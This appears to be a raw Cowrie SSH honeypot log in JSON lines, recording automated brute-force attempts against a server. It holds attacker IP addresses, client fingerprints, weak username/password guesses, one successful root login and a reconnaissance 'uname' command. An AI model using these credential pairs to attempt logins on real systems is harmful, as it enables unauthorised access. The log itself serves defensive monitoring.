{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:52:39.405608Z","src_ip":"212.227.125.160","session":"fa9d4e882d64"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.212","src_port":36152,"dst_ip":"1.2.3.4","dst_port":22,"session":"f20e9915474a","protocol":"ssh","message":"New connection: 154.209.4.212:36152 (1.2.3.4:22) [session: f20e9915474a]","sensor":"my-vps","timestamp":"2025-08-31T02:52:40.688600Z"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"P@ssw0rd123","message":"login attempt [ftptest/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:41.474708Z","src_ip":"212.227.125.160","session":"fa9d4e882d64"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:43.123290Z","src_ip":"212.227.125.160","session":"fa9d4e882d64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35022,"dst_ip":"1.2.3.4","dst_port":22,"session":"40a836adbd15","protocol":"ssh","message":"New connection: 212.227.235.229:35022 (1.2.3.4:22) [session: 40a836adbd15]","sensor":"my-vps","timestamp":"2025-08-31T02:52:49.188535Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44660,"dst_ip":"1.2.3.4","dst_port":22,"session":"e42905a0a3e8","protocol":"ssh","message":"New connection: 41.226.27.251:44660 (1.2.3.4:22) [session: e42905a0a3e8]","sensor":"my-vps","timestamp":"2025-08-31T02:52:51.453443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:52:51.476273Z","src_ip":"41.226.27.251","session":"e42905a0a3e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:52:51.497481Z","src_ip":"41.226.27.251","session":"e42905a0a3e8"}
{"eventid":"cowrie.login.failed","username":"centos","password":"123456","message":"login attempt [centos/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:52:51.669892Z","src_ip":"41.226.27.251","session":"e42905a0a3e8"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:52:52.618721Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:52:53.024215Z","src_ip":"41.226.27.251","session":"e42905a0a3e8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:03.931615Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:03.932392Z","src_ip":"212.227.235.229","session":"40a836adbd15"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40366,"dst_ip":"1.2.3.4","dst_port":22,"session":"412cdfb5d4c6","protocol":"ssh","message":"New connection: 41.226.27.251:40366 (1.2.3.4:22) [session: 412cdfb5d4c6]","sensor":"my-vps","timestamp":"2025-08-31T02:53:11.854554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:11.915273Z","src_ip":"41.226.27.251","session":"412cdfb5d4c6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:11.916084Z","src_ip":"41.226.27.251","session":"412cdfb5d4c6"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:12.180726Z","src_ip":"41.226.27.251","session":"412cdfb5d4c6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:13.433820Z","src_ip":"41.226.27.251","session":"412cdfb5d4c6"}
{"eventid":"cowrie.session.closed","duration":"54.5","message":"Connection lost after 54.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:13.782885Z","src_ip":"154.209.4.212","session":"70022c596a2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33028,"dst_ip":"1.2.3.4","dst_port":22,"session":"972df432c95e","protocol":"ssh","message":"New connection: 212.227.125.160:33028 (1.2.3.4:22) [session: 972df432c95e]","sensor":"my-vps","timestamp":"2025-08-31T02:53:14.711608Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57776,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5f1d09cc2be","protocol":"ssh","message":"New connection: 212.227.235.229:57776 (1.2.3.4:22) [session: a5f1d09cc2be]","sensor":"my-vps","timestamp":"2025-08-31T02:53:17.422765Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:18.198540Z","src_ip":"212.227.235.229","session":"a5f1d09cc2be"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:53:18.199289Z","src_ip":"212.227.235.229","session":"a5f1d09cc2be"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"letmein","message":"login attempt [ftptest/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:24.221507Z","src_ip":"212.227.235.229","session":"a5f1d09cc2be"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:26.130598Z","src_ip":"212.227.235.229","session":"a5f1d09cc2be"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:26.158171Z","src_ip":"154.209.4.212","session":"f20e9915474a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:26.158908Z","src_ip":"154.209.4.212","session":"f20e9915474a"}
{"eventid":"cowrie.session.closed","duration":"45.5","message":"Connection lost after 45.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:26.160594Z","src_ip":"154.209.4.212","session":"f20e9915474a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35508,"dst_ip":"1.2.3.4","dst_port":22,"session":"186d07a73886","protocol":"ssh","message":"New connection: 212.227.235.229:35508 (1.2.3.4:22) [session: 186d07a73886]","sensor":"my-vps","timestamp":"2025-08-31T02:53:27.042558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:27.043470Z","src_ip":"212.227.235.229","session":"186d07a73886"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:27.293449Z","src_ip":"212.227.235.229","session":"186d07a73886"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:28.045620Z","src_ip":"212.227.235.229","session":"186d07a73886"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:29.297156Z","src_ip":"212.227.235.229","session":"186d07a73886"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:53:31.666355Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:53:31.667302Z","src_ip":"212.227.125.160","session":"54733309fe31"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40222,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6de973687c8","protocol":"ssh","message":"New connection: 41.226.27.251:40222 (1.2.3.4:22) [session: c6de973687c8]","sensor":"my-vps","timestamp":"2025-08-31T02:53:32.181293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:32.182841Z","src_ip":"41.226.27.251","session":"c6de973687c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:32.232714Z","src_ip":"41.226.27.251","session":"c6de973687c8"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:53:32.384647Z","src_ip":"41.226.27.251","session":"c6de973687c8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:53:33.628406Z","src_ip":"41.226.27.251","session":"c6de973687c8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:34.495641Z","src_ip":"212.227.125.160","session":"972df432c95e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:53:34.612952Z","src_ip":"212.227.125.160","session":"972df432c95e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48436,"dst_ip":"1.2.3.4","dst_port":22,"session":"983cd41f9758","protocol":"ssh","message":"New connection: 212.227.125.160:48436 (1.2.3.4:22) [session: 983cd41f9758]","sensor":"my-vps","timestamp":"2025-08-31T02:53:38.684405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:39.536764Z","src_ip":"212.227.125.160","session":"983cd41f9758"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:53:39.538303Z","src_ip":"212.227.125.160","session":"983cd41f9758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45176,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2bbc0db479d","protocol":"ssh","message":"New connection: 212.227.235.229:45176 (1.2.3.4:22) [session: c2bbc0db479d]","sensor":"my-vps","timestamp":"2025-08-31T02:53:39.546764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:53:39.547464Z","src_ip":"212.227.235.229","session":"c2bbc0db479d"}
